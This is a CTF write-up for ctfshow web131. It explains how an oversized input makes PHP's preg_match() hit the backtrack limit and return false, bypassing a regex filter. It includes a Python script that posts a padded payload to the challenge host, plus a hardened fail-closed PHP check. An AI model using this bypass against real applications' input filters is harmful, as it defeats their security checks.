web131 notes (backtrack limit + string function)
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-13 05:19:40
*/

error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
    $f = (String)$_POST['f'];

    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f,'36Dctfshow') === FALSE){
        die('bye!!');
    }

    echo $flag;
}
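This time a string conversion, (String), is applied to the input. The script from the previous challenge works after a small change, and it relies on the regex backtrack limit in the same way: when PCRE exceeds pcre.backtrack_limit, preg_match() returns false rather than 0 or 1, so the first if does not fire, while stripos() still finds '36Dctfshow' at the end of the input.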
# -*- coding:UTF-8 -*-
# Author:dota_st
# Date:2021/2/27 17:52
# blog: www.wlhhlc.top
import requests

url = "http://9b9aa879-e1b7-4f83-9c38-ea3132ac969b.chall.ctf.show:8080/"
data = {
    'f': 'mmmmmmmm'*170000+'36Dctfshow'
}
res = requests.post(url=url,data=data)
print(res.text)
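The fix for the check above, as an added example that is not part of the original notes or the challenge code: compare the preg_match() result strictly and fail closed when the engine returns false. The helper name is_blocked(), the 4096-byte cap and the sample inputs are assumptions; preg_last_error_msg() needs PHP 8.

```php
<?php
// Added example, not the challenge's code. is_blocked() is a hypothetical helper.

/**
 * Returns true when $input must be rejected.
 * preg_match() returns 1 (match), 0 (no match) or false (engine error such
 * as PREG_BACKTRACK_LIMIT_ERROR). Only an explicit 0 is treated as clean.
 */
function is_blocked(string $input, int $maxLen = 4096): bool
{
    // Assumed length cap: bounds the regex work before the engine runs.
    if (strlen($input) > $maxLen) {
        return true;
    }
    $r = preg_match('/.+?ctfshow/is', $input);
    if ($r === false) {
        // Fail closed and record why the engine gave up.
        error_log('preg_match failed: ' . preg_last_error_msg());
        return true;
    }
    return $r === 1;
}

// Constructed inputs for comparison.
$samples = [
    'short clean'  => 'hello',
    'direct match' => 'xx36Dctfshow',
    'oversized'    => str_repeat('m', 1360000) . '36Dctfshow',
];

foreach ($samples as $name => $s) {
    // Original-style check: false is falsy, so an engine error reads as "no match".
    $loose = preg_match('/.+?ctfshow/is', $s) ? 'blocked' : 'passed';
    // Hardened check with the length cap.
    $strict = is_blocked($s) ? 'blocked' : 'passed';
    // Hardened check without the cap, relying on the strict false comparison.
    $nocap = is_blocked($s, PHP_INT_MAX) ? 'blocked' : 'passed';
    printf("%-13s loose=%s strict=%s strict_nocap=%s\n", $name, $loose, $strict, $nocap);
}
```

Whether the oversized input actually makes the engine return false depends on pcre.backtrack_limit and pcre.jit on the host, which is why the strict check handles both the false and the 1 result.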